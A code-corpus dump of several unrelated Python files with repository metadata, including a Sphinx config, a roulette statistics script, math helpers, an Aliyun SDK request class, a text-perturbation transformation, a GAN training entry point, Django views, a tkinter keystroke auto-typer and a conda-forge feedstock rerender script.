# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'JPypedoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
# 'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
('index', 'JPype.tex', u'JPype Documentation',
u'Steve Menard, Luis Nell and others', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'jpype', u'JPype Documentation',
[u'Steve Menard, Luis Nell and others'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'JPype', u'JPype Documentation',
u'Steve Menard, Luis Nell and others', 'JPype', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#texinfo_no_detailmenu = False
napoleon_custom_sections = ["Static Methods", "Virtual Methods", "Constructors"]
| 30.866856 | 122 | 0.709435 |
4a25755b452adc4c207c377deb9f8adfae71cf3d | 3,118 | py | Python | Beat-The-Roulette.py | robyg72/BeatTheRoulette | c9dc548edf9ba04c8fab224f99e2b6efa2887e85 | [
"MIT"
] | null | null | null | Beat-The-Roulette.py | robyg72/BeatTheRoulette | c9dc548edf9ba04c8fab224f99e2b6efa2887e85 | [
"MIT"
] | null | null | null | Beat-The-Roulette.py | robyg72/BeatTheRoulette | c9dc548edf9ba04c8fab224f99e2b6efa2887e85 | [
"MIT"
] | null | null | null | # percentuale di pari e dispari
# percentuale di rossi e neri
# percentuale dozzina
reds = [1, 3, 5, 7, 9, 12, 14, 16, 18, 19, 21, 23, 25, 27, 30, 32, 34, 36]
blacks = [2, 6, 4, 8, 10, 11, 13, 15, 17, 20, 22, 24, 26, 28, 29, 31, 33, 35]
class Outcome(object):
def __init__(self, number):
# store the number drawn
self.number = int(number)
# set if number is even or odd
if self.number % 2 == 0:
self.is_even = True
else:
self.is_even = False
# set if number is zero
if self.number == 0:
self.is_zero = True
else:
self.is_zero = False
# set color of the number
if self.number in reds:
self.is_red = True
else:
self.is_red = False
if self.number in blacks:
self.is_black = True
else:
self.is_black = False
def __str__(self):
if self.is_even:
parity = "even"
else:
parity = "odd"
if self.is_zero:
parity = "is zero"
color = ""
else:
if self.is_red:
color = "RED"
else:
color = "BLACK"
return str(self.number) + " " + parity + " " + color
class Roulette(object):
def __init__(self):
self.lastOutcome = None
self.mean = 0
self.red_percentage = 0
self.black_percentage = 0
self.odd_percentage = 0
self.even_percentage = 0
self.numbers = [] # store each Outcome drawn
self.extractionNumber = 0
self.frequency = {"0": 0,
"1": 0, "2": 0, "3": 0, "4": 0, "5": 0, "6": 0, "7": 0, "8": 0, "9": 0, "10": 0, "11": 0,
"12":0, "13":0, "14":0, "15":0, "16": 0,
"34": 0, "35": 0, "36": 0} # store frequency outcomes for each figure
# Calculates the mean value after each extraction
def __mean(self):
m = 0
if len(self.numbers) > 0:
for n in self.numbers:
m = m + n.number
m = m / len(self.numbers)
else:
m = 0
return m
def new_outcome(self, number):
outcome = Outcome(number)
self.lastOutcome = outcome
self.numbers.append(outcome)
if str(outcome.number) in self.frequency:
self.frequency[str(outcome.number)] = self.frequency[str(outcome.number)] + 1
self.extractionNumber = len(self.numbers)
for o in self.numbers:
if o.number != 0:
if o.number % 2 == 0:
self.even_percentage += 1
else:
self.odd_percentage += 1
if __name__ == "__main__":
r = Roulette()
cmd = '0'
while cmd != '99':
cmd = raw_input("Numero estratto ")
r.new_outcome(cmd)
print "------------------------------"
print "Numero di estrazioni " + str(r.extractionNumber)
for e in r.numbers:
print e
print "------------------------------" | 29.695238 | 115 | 0.480757 |
4a2575ddd78fee5390f03a021e0690d51d32542c | 1,863 | py | Python | phenum/numerics.py | wsmorgan/phonon-enumeration | 5d7a8d8e3403cc387bdd58cf98a23e4751ea34dd | [
"MIT-0"
] | 5 | 2016-06-17T05:39:27.000Z | 2021-05-30T21:02:08.000Z | phenum/numerics.py | wsmorgan/phonon-enumeration | 5d7a8d8e3403cc387bdd58cf98a23e4751ea34dd | [
"MIT-0"
] | 66 | 2016-04-02T05:02:08.000Z | 2018-07-05T19:43:09.000Z | phenum/numerics.py | wsmorgan/phonon-enumeration | 5d7a8d8e3403cc387bdd58cf98a23e4751ea34dd | [
"MIT-0"
] | 5 | 2017-03-15T21:28:44.000Z | 2020-01-09T14:44:45.000Z | """Numerical methods for mathematical functions neede for the program"""
import numpy as np
#This method finds the factorial of a given number(num).
#The method calls for an integer input num
#The method returns the factorial(represented as fact in the method)
def factorial(num):
"""Finds the factorial of the input integer.
Args:
num (int): The integer to find the factorial of.
Returns:
fact (int): The factorial of num.
"""
#If the number provided is zero then the factorial is 1
if num == 0:
fact = 1
#Otherwise set fact to 1 and begin finding the factorial r is
#used to find each num-n for n=0 to n=num each value in r is
#then used to compute the factorial
else:
fact = 1
r = list(range(1,num+1))
for i in r:
fact *= i
return fact
def binomial_coefficient(n, k):
"""Finds the binomial coefficient n choose k. See
https://en.wikipedia.org/wiki/Binomial_coefficient for details.
Args:
n (int): An integer.
k (int): An integer.
Returns:
t (int): The binomial coefficient, n choose k.
"""
if not (-1 < k < n+1):
return 0
if k==0 and n == 0:
return 1
t = 1
if k < n-k:
for i in range(n, n-k, -1):
t = t*i//(n-i+1)
else:
for i in range(n, k, -1):
t = t*i//(n-i+1)
return t
def multinomial(n):
"""Finds the multinomial coefficient for a given array of numbers.
Args:
n (list): the interegs to be used.
"""
binomials = [[np.sum(n),n[0]]]
for i in range(1,len(n)):
new_sum = binomials[i-1][0]-binomials[i-1][1]
binomials.append([new_sum,n[i]])
bins = []
for b in binomials:
bins.append(binomial_coefficient(b[0],b[1]))
return np.prod(bins)
| 25.875 | 72 | 0.57971 |
4a2575f061410c28d0360ed40f76cf49b9db4be6 | 168 | py | Python | adoteaqui/adoteaqui/ext/bcrypt.py | eduardooarruda/AdoteAqui2 | 8b329f9a4b4a6d29158f490ccc59791de7c717a4 | [
"MIT"
] | null | null | null | adoteaqui/adoteaqui/ext/bcrypt.py | eduardooarruda/AdoteAqui2 | 8b329f9a4b4a6d29158f490ccc59791de7c717a4 | [
"MIT"
] | null | null | null | adoteaqui/adoteaqui/ext/bcrypt.py | eduardooarruda/AdoteAqui2 | 8b329f9a4b4a6d29158f490ccc59791de7c717a4 | [
"MIT"
] | null | null | null | from flask import Flask
from flask_bcrypt import Bcrypt
from typing import NoReturn
bcrypt = Bcrypt()
def init_app(app : Flask) -> NoReturn:
bcrypt.init_app(app) | 18.666667 | 38 | 0.761905 |
4a257626ef7a2dff9d1a9419ef8bb6383fa4ffc7 | 2,594 | py | Python | aliyun-python-sdk-rtc/aliyunsdkrtc/request/v20180111/CreateSubscribeRequest.py | leafcoder/aliyun-openapi-python-sdk | 26b441ab37a5cda804de475fd5284bab699443f1 | [
"Apache-2.0"
] | 1,001 | 2015-07-24T01:32:41.000Z | 2022-03-25T01:28:18.000Z | aliyun-python-sdk-rtc/aliyunsdkrtc/request/v20180111/CreateSubscribeRequest.py | leafcoder/aliyun-openapi-python-sdk | 26b441ab37a5cda804de475fd5284bab699443f1 | [
"Apache-2.0"
] | 363 | 2015-10-20T03:15:00.000Z | 2022-03-08T12:26:19.000Z | aliyun-python-sdk-rtc/aliyunsdkrtc/request/v20180111/CreateSubscribeRequest.py | leafcoder/aliyun-openapi-python-sdk | 26b441ab37a5cda804de475fd5284bab699443f1 | [
"Apache-2.0"
] | 682 | 2015-09-22T07:19:02.000Z | 2022-03-22T09:51:46.000Z | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from aliyunsdkcore.request import RpcRequest
from aliyunsdkrtc.endpoint import endpoint_data
class CreateSubscribeRequest(RpcRequest):
def __init__(self):
RpcRequest.__init__(self, 'rtc', '2018-01-11', 'CreateSubscribe','rtc')
self.set_method('POST')
if hasattr(self, "endpoint_map"):
setattr(self, "endpoint_map", endpoint_data.getEndpointMap())
if hasattr(self, "endpoint_regional"):
setattr(self, "endpoint_regional", endpoint_data.getEndpointRegional())
def get_ClientToken(self):
return self.get_query_params().get('ClientToken')
def set_ClientToken(self,ClientToken):
self.add_query_param('ClientToken',ClientToken)
def get_Eventss(self):
return self.get_query_params().get('Events')
def set_Eventss(self, Eventss):
for depth1 in range(len(Eventss)):
if Eventss[depth1] is not None:
self.add_query_param('Events.' + str(depth1 + 1) , Eventss[depth1])
def get_OwnerId(self):
return self.get_query_params().get('OwnerId')
def set_OwnerId(self,OwnerId):
self.add_query_param('OwnerId',OwnerId)
def get_Userss(self):
return self.get_query_params().get('Users')
def set_Userss(self, Userss):
for depth1 in range(len(Userss)):
if Userss[depth1] is not None:
self.add_query_param('Users.' + str(depth1 + 1) , Userss[depth1])
def get_AppId(self):
return self.get_query_params().get('AppId')
def set_AppId(self,AppId):
self.add_query_param('AppId',AppId)
def get_CallbackUrl(self):
return self.get_query_params().get('CallbackUrl')
def set_CallbackUrl(self,CallbackUrl):
self.add_query_param('CallbackUrl',CallbackUrl)
def get_ChannelId(self):
return self.get_query_params().get('ChannelId')
def set_ChannelId(self,ChannelId):
self.add_query_param('ChannelId',ChannelId) | 33.25641 | 74 | 0.743254 |
4a25767157beebd1d3225c64c93e2f6109f97ad3 | 7,125 | py | Python | transformations/contextual_meaning_perturbation/transformation.py | vadesecure/NL-Augmenter | f8419db984bd501ec0cc61d167f53fe3e2410f99 | [
"MIT"
] | null | null | null | transformations/contextual_meaning_perturbation/transformation.py | vadesecure/NL-Augmenter | f8419db984bd501ec0cc61d167f53fe3e2410f99 | [
"MIT"
] | null | null | null | transformations/contextual_meaning_perturbation/transformation.py | vadesecure/NL-Augmenter | f8419db984bd501ec0cc61d167f53fe3e2410f99 | [
"MIT"
] | null | null | null | import itertools
import logging
import random
from collections import defaultdict
import spacy
from transformers import pipeline
from interfaces.SentenceOperation import SentenceOperation
from tasks.TaskTypes import TaskType
class ContextualMeaningPerturbation(SentenceOperation):
tasks = [
TaskType.TEXT_CLASSIFICATION,
TaskType.QUALITY_ESTIMATION,
]
languages = ["en", "de"]
keywords = [
"lexical",
"transformer-based",
"parser-based",
"tokenizer-required",
"natural",
"meaning-alteration",
"high-precision",
"high-coverage",
"high-generation",
]
heavy = True
def __init__(
self,
seed=0,
max_outputs=1,
top_k=10,
language="en",
pos_to_change=["ADV", "ADJ", "VERB", "NOUN", "PROPN"],
perturbation_rate=0.3,
):
super().__init__(seed, max_outputs=max_outputs)
self.seed = seed
self.max_outputs = max_outputs
random.seed(self.seed)
logging.info(
"Starting to load the cross-lingual XLM-R (base) model.\n"
)
self.unmasker = pipeline(
"fill-mask", model="xlm-roberta-base", top_k=top_k
)
logging.info(
"Completed loading the cross-lingual XLM-R (base) model.\n"
)
logging.info(
"Starting to load Spacy model ("
+ language
+ ") for retrieving linguistic features.\n"
)
if language == "en":
self.linguistic_pipeline = spacy.load("en_core_web_sm")
elif language == "de":
try:
self.linguistic_pipeline = spacy.load("de_core_news_sm")
except ImportError:
print(
"To perturb German text, please download SpaCy's German pipeline de_core_news_sm, \
for example by using the following command: python -m spacy download de_core_news_sm"
)
else:
raise NotImplementedError(
"As of now, only English and German are supported."
)
logging.info("Completed loading Spacy model.\n")
self.pos_to_change = pos_to_change
assert perturbation_rate <= 1 and perturbation_rate >= 0
self.percentage = perturbation_rate # How many of the elligable POS tags should be changed? Expects values between 0 and 1
def get_linguistic_features(self, input: str):
"""
Linguistic analysis of the input sentence.
Returns a list of tokens, POS tags and lemmatised tokens.
"""
tokens = []
pos_tags = []
lemmas = []
sentence = self.linguistic_pipeline(input)
for token in sentence:
tokens.append(token.text)
pos_tags.append(token.pos_)
lemmas.append(token.lemma)
return tokens, pos_tags, lemmas
def count_eligible_tokens(self, pos_tags):
"""
Returns the number of words that will be replaced.
"""
pos_count = 0
for pos in self.pos_to_change:
pos_count += pos_tags.count(pos)
return pos_count
def get_perturbation_candidates(self, input: str):
"""
Samples tokens that will be replaced.
Generates and returns the top k contextual replacement candidates.
"""
perturbation_dict = {}
tokens, pos_tags, lemmas = self.get_linguistic_features(input)
if self.count_eligible_tokens(pos_tags) == 0:
logging.warning(
"Warning: Sequence remained unchanged as it didn't include the following POS tags: {} \nAffected sequence: {}".format(
self.pos_to_change, input
)
)
num_word_swaps = 0
else:
num_word_swaps = max(
1,
round(self.percentage * self.count_eligible_tokens(pos_tags)),
)
logging.info(num_word_swaps, " tokens will be masked.\n")
tokens_to_mask = random.sample(
[
token
for i, token in enumerate(tokens)
if pos_tags[i] in self.pos_to_change
],
num_word_swaps,
)
for token in tokens_to_mask:
masked_input = input.replace(token, "<mask>", 1)
perturbation_dict[token] = self.unmasker(masked_input)
return perturbation_dict
def select_and_apply_perturbations(self, input: str):
"""
Applies perturbations and returns the perturbed sentence
By default, the best fitting candidate is used.
If the top k candidate list includes a token with the same POS tag but different word family
as the original token, it will be used instead of the default.
"""
perturbation_dict = self.get_perturbation_candidates(input)
tokens, pos_tags, lemmas = self.get_linguistic_features(input)
replacement_dict = defaultdict(list)
for original_token in perturbation_dict:
# Replace with the first best choice in case no better candidate is found
for replacement_candidate in perturbation_dict[original_token]:
p_tokens, p_pos_tags, p_lemmas = self.get_linguistic_features(
replacement_candidate["sequence"]
)
# The selected word should have the same POS tag but originate from a different word family
if p_lemmas != lemmas and p_pos_tags == pos_tags:
replacement_dict[original_token].append(
replacement_candidate["token_str"]
)
# break
if original_token not in replacement_dict.keys():
replacement_dict[original_token].append(
perturbation_dict[original_token][0]["token_str"]
)
logging.info("The following words will be replaced:\n")
for key in replacement_dict:
logging.info(
"Replacement candidates for",
key,
"include",
replacement_dict[key],
)
# Calculate how many perturbations will be returned
keys, values = zip(*replacement_dict.items())
permutations = list(itertools.product(*values))
num_perturbations = min(self.max_outputs, len(permutations))
perturbed_sentences = []
for i in range(num_perturbations):
perturbed_sentence = input
for j in range(len(keys)):
perturbed_sentence = perturbed_sentence.replace(
keys[j], permutations[i][j], 1
)
perturbed_sentences.append(perturbed_sentence)
return perturbed_sentences
def generate(self, sentence: str):
perturbation_sentences = self.select_and_apply_perturbations(sentence)
logging.info("Original:/t", sentence)
logging.info("Perturbation:/t", perturbation_sentences)
return perturbation_sentences
| 35.984848 | 134 | 0.595789 |
4a2577b9d6bdbcff6a0d5f99bb2aad8e5ec77981 | 3,186 | py | Python | mainsite/data.py | jazzyeagle/chatbot_website | 47da27f85907b5f3f7ea94bffd343a6322b8f39a | [
"BSD-3-Clause"
] | null | null | null | mainsite/data.py | jazzyeagle/chatbot_website | 47da27f85907b5f3f7ea94bffd343a6322b8f39a | [
"BSD-3-Clause"
] | null | null | null | mainsite/data.py | jazzyeagle/chatbot_website | 47da27f85907b5f3f7ea94bffd343a6322b8f39a | [
"BSD-3-Clause"
] | 1 | 2022-03-05T15:08:45.000Z | 2022-03-05T15:08:45.000Z | from django.db.models.functions import Lower
from django.utils.http import urlsafe_base64_encode, urlsafe_base64_decode
from mainsite.models import *
from show.models import *
from users import data
from result import ResultFlag, Result
def index(request):
if 'user_id' in request.session:
user = User.objects.get(id=request.session['user_id'])
# Uses the user page as default, so pull same data
page_data = data.user(request, user.username)
if page_data.isOk:
return Result(ResultFlag.Ok, page_data.get() )
else:
return Result(ResultFlag.Error, 'Could not get User data')
else:
user = None
return Result(ResultFlag.Ok, {})
def tours(request):
if 'user_id' in request.session:
user = User.objects.get(id=request.session['user_id'])
else:
user = None
return Result(ResultFlag.Ok, { 'tours': Tour.objects.all().order_by('month'),
'user': user
})
def venues(request):
if 'user_id' in request.session:
user = User.objects.get(id=request.session['user_id'])
else:
user = None
return Result(ResultFlag.Ok, { 'venues': Venue.objects.all().order_by('date'),
'user': user
})
def songs(request):
if 'user_id' in request.session:
user = User.objects.get(id=request.session['user_id'])
else:
user = None
return Result(ResultFlag.Ok, { 'songs': Song.objects.all().order_by(Lower('title')),
'user': user
})
def tour(request, tour_name):
tour = Tour.objects.get(url_slug=tour_name)
if 'user_id' in request.session:
user = User.objects.get(id=request.session['user_id'])
else:
user = None
return Result(ResultFlag.Ok, {
'tour': tour,
'venues': tour.venue_set.order_by('date'),
'user': user
})
def venue(request, tour_name, venue_name):
venue = Venue.objects.get(url_slug=venue_name)
if 'user_id' in request.session:
user = User.objects.get(id=request.session['user_id'])
else:
user = None
return Result(ResultFlag.Ok, {
'venue': venue,
'songs': venue.song_set.order_by('track_number'),
'user': user
})
def song(request, tour_name, venue_name, song_title):
song = Song.objects.get(url_slug=song_title)
if 'user_id' in request.session:
user = User.objects.get(id=request.session['user_id'])
else:
user = None
data = { 'song': song,
'user': user
}
for rt in Command.objects.all():
data[rt.text.replace(' ', '_')] = song.song_requests.filter(command=rt)
for s in data['instrument']:
print(s.played_by.username)
return Result(ResultFlag.Ok, data)
| 32.845361 | 88 | 0.542687 |
4a257889613aecb943ca4a10604834bec432b45f | 2,365 | py | Python | typer.py | Jaasim2008/Ultra-Typer-V2 | 14c5b8994fb0b3deab2bad1cda685ffc92ce61fe | [
"MIT"
] | null | null | null | typer.py | Jaasim2008/Ultra-Typer-V2 | 14c5b8994fb0b3deab2bad1cda685ffc92ce61fe | [
"MIT"
] | null | null | null | typer.py | Jaasim2008/Ultra-Typer-V2 | 14c5b8994fb0b3deab2bad1cda685ffc92ce61fe | [
"MIT"
] | null | null | null | from tkinter import *
from tkinter import messagebox
from json_manager import *
from pynput.keyboard import Key, Controller
import time
root = Tk()
root.title('Ultra Typer v2')
root.geometry('700x400')
my_icon = PhotoImage(file='keyboard.png')
root.iconphoto(False, my_icon)
dark_col = '#3d3d3d'
root.config(bg=dark_col)
frame1 = Frame(root, bg=dark_col)
frame1.pack(fill=BOTH)
def page_two():
frame2 = Frame(bg=dark_col)
frame2.pack(fill=BOTH)
def start_type():
new_module = Json_Manager('settings.json')
word_data = new_module.get_data('word')
number_data = new_module.get_data('number')
keyb = Controller()
time.sleep(5)
for x in range(int(number_data)):
time.sleep(0.1)
for char in word_data:
keyb.press(char)
keyb.release(char)
messagebox.showinfo('Done!', 'Finished Typing!')
new_module.clear_data()
btn2 = Button(frame2, bg=dark_col, text='Start Typing ( start in 5 sec )', font=('Arial Italic', 20), relief=SUNKEN
, bd=0, command=start_type, fg='white')
btn2.pack(pady=20)
btn3 = Button(frame2, bg=dark_col, text='Quit App', font=('Arial Italic', 20), relief=SUNKEN, bd=0,
command=root.destroy, fg='white')
btn3.pack(pady=20)
def save_and_move():
the_word = ent1.get()
the_number = ent2.get()
new_mod = Json_Manager('settings.json')
new_mod.write_data('word', the_word)
new_mod.append_data('number', the_number)
frame1.pack_forget()
page_two()
lbl = Label(frame1, bg=dark_col, text='Enter Word :', font=('Arial Italic', 17), fg='white')
lbl.pack(pady=20)
ent1 = Entry(frame1, bg=dark_col, bd=1, relief=SUNKEN, font=('Arial Italic', 20), fg='white')
ent1.pack(pady=20)
lbl2 = Label(frame1, bg=dark_col, text='Enter Number Of Times The Word Should Be Typed :', fg='white', bd=0
, font=('Arial Italic', 17))
lbl2.pack(pady=20)
ent2 = Entry(frame1, bg=dark_col, bd=1, relief=SUNKEN, font=('Arial Italic', 20), fg='white')
ent2.pack(pady=20)
btn1 = Button(frame1, bg=dark_col, text='Submit Data', bd=1, relief=SUNKEN, font=('Arial Italic', 20), fg='orange'
, command=save_and_move)
btn1.pack(pady=20, side=BOTTOM)
root.mainloop()
| 31.118421 | 120 | 0.629598 |
4a2578bb97cb1d5070a67bb8a82d675e22e581b2 | 1,594 | py | Python | main.py | HaoZhang1018/MFF-GAN_Inf2020 | 2f674c8aa00613e4637b8b12c772323b872fa9b4 | [
"MIT"
] | 12 | 2020-10-19T08:45:08.000Z | 2022-03-08T12:56:08.000Z | main.py | HaoZhang1018/MFF-GAN_TF2 | 0a67caadac0558146da620058f419e630063d93d | [
"MIT"
] | 2 | 2020-12-01T22:32:49.000Z | 2022-01-29T09:51:41.000Z | main.py | HaoZhang1018/MFF-GAN_TF2 | 0a67caadac0558146da620058f419e630063d93d | [
"MIT"
] | 3 | 2020-10-19T08:45:31.000Z | 2022-02-10T07:56:09.000Z | # -*- coding: utf-8 -*-
from model import CGAN
from utils import input_setup
import numpy as np
import tensorflow as tf
import pprint
import os
flags = tf.app.flags
flags.DEFINE_integer("epoch", 20, "Number of epoch [10]")
flags.DEFINE_integer("batch_size", 32, "The size of batch images [128]")
flags.DEFINE_integer("image_size", 60, "The size of image to use [33]")
flags.DEFINE_float("learning_rate", 1e-4, "The learning rate of gradient descent algorithm [1e-4]")
flags.DEFINE_integer("c_dim", 1, "Dimension of image color. [1]")
flags.DEFINE_integer("scale", 3, "The size of scale factor for preprocessing input image [3]")
flags.DEFINE_integer("stride",10, "The size of stride to apply input image [14]")
flags.DEFINE_string("checkpoint_dir", "checkpoint", "Name of checkpoint directory [checkpoint]")
flags.DEFINE_string("sample_dir", "sample", "Name of sample directory [sample]")
flags.DEFINE_string("summary_dir", "log", "Name of log directory [log]")
flags.DEFINE_boolean("is_train", True, "True for training, False for testing [True]")
FLAGS = flags.FLAGS
pp = pprint.PrettyPrinter()
def main(_):
pp.pprint(flags.FLAGS.__flags)
if not os.path.exists(FLAGS.checkpoint_dir):
os.makedirs(FLAGS.checkpoint_dir)
with tf.Session() as sess:
srcnn = CGAN(sess,
image_size=FLAGS.image_size,
batch_size=FLAGS.batch_size,
c_dim=FLAGS.c_dim,
checkpoint_dir=FLAGS.checkpoint_dir,
sample_dir=FLAGS.sample_dir)
srcnn.train(FLAGS)
if __name__ == '__main__':
tf.app.run()
| 34.652174 | 99 | 0.699498 |
4a2578d409ea7556318f5e88e383dc68ca7ad965 | 8,735 | py | Python | scripts/regenerate_feedstock.py | janschulz/conda-forge.github.io | 0d73991264b778e6759ceec8bea9ff915595ba78 | [
"BSD-3-Clause"
] | null | null | null | scripts/regenerate_feedstock.py | janschulz/conda-forge.github.io | 0d73991264b778e6759ceec8bea9ff915595ba78 | [
"BSD-3-Clause"
] | null | null | null | scripts/regenerate_feedstock.py | janschulz/conda-forge.github.io | 0d73991264b778e6759ceec8bea9ff915595ba78 | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/env conda-execute
"""
This script is used to manage the feedstocks by regenerating the content (from conda-smithy).
The first feedstock found which needed re-generating will then have a branch pushed and a pull request open.
Whilst it is out of date, the following pseudo code was used to outline this module:
for feedstock in feedstocks:
checkout a clean branch named "feedstock_rerender" from upstream/master
conda smithy rerender feedstock
if feedstock has diffs:
if diff between origin/feedstock_redender and "feedstock_rerender":
force push origin/feedstock_rerender
if pull request for branch:
add a comment
else:
create a pull request
break
"""
# conda execute
# env:
# - python
# - conda-smithy
# - gitpython
# - pygithub
# channels:
# - conda-forge
# run_with: python
import os
import time
import argparse
from contextlib import contextmanager
import textwrap
import random
import git
import github
import conda_smithy.github
import conda_smithy.configure_feedstock
import conda_smithy
import conda_smithy.feedstocks as feedstocks
parser = argparse.ArgumentParser(description='Propose a feedstock update.')
parser.add_argument('--feedstocks-dir', help="The location of the feedstocks.",
default="~/dev/conda-forge/feedstocks")
args = parser.parse_args()
feedstocks_dir = os.path.expanduser(args.feedstocks_dir)
feedstocks.clone_all('conda-forge', feedstocks_dir)
feedstocks.fetch_feedstocks(feedstocks_dir)
# TODO: What about feedstocks that get removed?
randomised_feedstocks = list(feedstocks.cloned_feedstocks(feedstocks_dir))
# Shuffle is in-place. :(
random.shuffle(randomised_feedstocks)
gh_token = conda_smithy.github.gh_token()
gh = github.Github(gh_token)
gh_me = gh.get_user()
if gh_me.login != 'conda-forge-admin':
raise ValueError("The github token isn't that of conda-forge-admin (it's "
"for {}), I'm going to have to bail.".format(gh_me.login))
gh_forge = gh.get_organization('conda-forge')
def my_repos(gh_user):
"""
List all of my repos.
See https://github.com/PyGithub/PyGithub/issues/390 for rationale.
"""
return github.PaginatedList.PaginatedList(
github.Repository.Repository,
gh_user._requester,
gh_user.url + "/repos",
dict(affiliation="owner"))
def list_pulls(repo, state='open', head=None):
"""
List all of the pull requests that match the given critera.
At the time of writing, pygithub doesn't allow you to specify the head,
so I had to create this function.
"""
url_parameters = dict(state=state)
if head:
url_parameters['head'] = head
return github.PaginatedList.PaginatedList(
github.PullRequest.PullRequest,
repo._requester,
repo.url + "/pulls",
url_parameters
)
# Set to false to debug.
if True:
print("Collecting list of conda-forge-admin repos...")
my_repos = {repo.name: repo for repo in my_repos(gh_me)}
print("Collecting list of conda-forge repos...")
forge_repos = {repo.name: repo for repo in gh_forge.get_repos()}
else:
# For debugging, we turn our attention to a single feedstock.
debug_name = 'pyproj-feedstock'
my_repos = {debug_name: gh_me.get_repo(debug_name)}
forge_repos = {debug_name: gh_me.get_repo(debug_name)}
randomised_feedstocks = [feedstock for feedstock in randomised_feedstocks
if feedstock.name == debug_name]
@contextmanager
def tmp_remote(repo, remote_name, url):
if remote_name in [remote.name for remote in repo.remotes]:
repo.delete_remote(remote_name)
remote = repo.create_remote(remote_name, url)
yield remote
repo.delete_remote(remote_name)
for feedstock in randomised_feedstocks:
print('Checking {}'.format(feedstock.name))
if feedstock.name not in forge_repos:
raise ValueError("There exists a feedstock ({}) which isn't in the "
"conda-forge org.".format(feedstock.name))
if feedstock.name not in my_repos:
forge_repo = gh_forge.get_repo(feedstock.name)
print('Forking {}'.format(feedstock.name))
gh_me.create_fork(forge_repo)
my_repos[feedstock.name] = gh_me.get_repo(feedstock.name)
clone = git.Repo(feedstock.directory)
admin_fork = my_repos[feedstock.name]
forge_feedstock = forge_repos[feedstock.name]
# Put an appropriate conda-forge-admin remote in place.
with tmp_remote(clone, 'conda-forge-admin',
admin_fork.clone_url.replace('https://',
'https://{}@'.format(gh_token))) as remote:
remote.fetch()
clone.remotes.upstream.fetch()
if 'feedstock_rerender' in clone.heads:
clone.heads.master.checkout()
clone.delete_head('feedstock_rerender', '-D')
clone.create_head('feedstock_rerender', clone.remotes.upstream.refs.master).set_tracking_branch(clone.remotes.upstream.refs.master)
# Reset the working tree to a clean state.
clone.head.reset(index=True, working_tree=True)
clone.heads.feedstock_rerender.checkout()
# Technically, we can do whatever we like to the feedstock now. Let's just
# update the feedstock though. For examples of other things that *have* been
# done here - once upon a time @pelson modified the conda-forge.yaml config
# item for every single feedstock, and submitted PRs for every project.
conda_smithy.configure_feedstock.main(feedstock.directory)
if not clone.is_dirty():
# We don't need this feedstock - it is slap-bang up to date. :)
print("{} was checked, and is up-to-date".format(feedstock.name))
continue
# if no changes, continue. Else, commit, push and pull request.
clone.git.add('-A')
commit = clone.index.commit("MNT: Updated the feedstock for conda-smithy version {}.".format(conda_smithy.__version__))
if 'feedstock_rerender' in remote.refs:
diff = commit.diff(remote.refs.feedstock_rerender)
if not diff:
# There were no differences between this and the remote feedstock_rerender, so just continue.
print("{} was checked, and whilst there are changes needed, the PR is up-to-date".format(feedstock.name))
continue
remote.push('+feedstock_rerender')
rerender_pulls = list(list_pulls(forge_feedstock, state='open', head='conda-forge-admin:feedstock_rerender'))
if rerender_pulls:
pull = rerender_pulls[0]
msg = textwrap.dedent("""
It's the friendly automated conda-forge-admin here again.
Just to let you know, I've updated this PR so that it has the latest render from conda-smithy (version {}).
If there are no problems with it, please consider merging this PR.
If there are concerns about it, please ping the 'conda-forge/core' team (using the @ notation in a comment).
Thanks!
""".format(conda_smithy.__version__))
pull.create_issue_comment(msg)
print('Updated PR on {}'.format(forge_feedstock.html_url))
else:
# TODO: Should there be one for each branch in the repo?
msg = textwrap.dedent("""
Hi! This is the friendly conda-forge-admin automated user.
I've re-rendered this feedstock with the latest version of conda-smithy ({}) and noticed some changes.
If the changes look good, then please go ahead and merge this PR.
If you have any questions about the changes though, please feel free to ping the 'conda-forge/core' team (using the @ notation in a comment).
Remember, for any changes to the recipe you would normally need to increment the version or the build number of the package.
Since this is an infrastructural change, we don't actually need/want a new version to be uploaded to anaconda.org/conda-forge, so the version and build/number are left unchanged.
Thanks!
""".format(conda_smithy.__version__))
forge_feedstock.create_pull(title='MNT: Re-render the feedstock',
body=msg,
head="conda-forge-admin:feedstock_rerender", base="master")
print('Opened PR on {}'.format(forge_feedstock.html_url))
# Stop processing any more feedstocks until the next time the script is run.
break
| 38.995536 | 194 | 0.666857 |
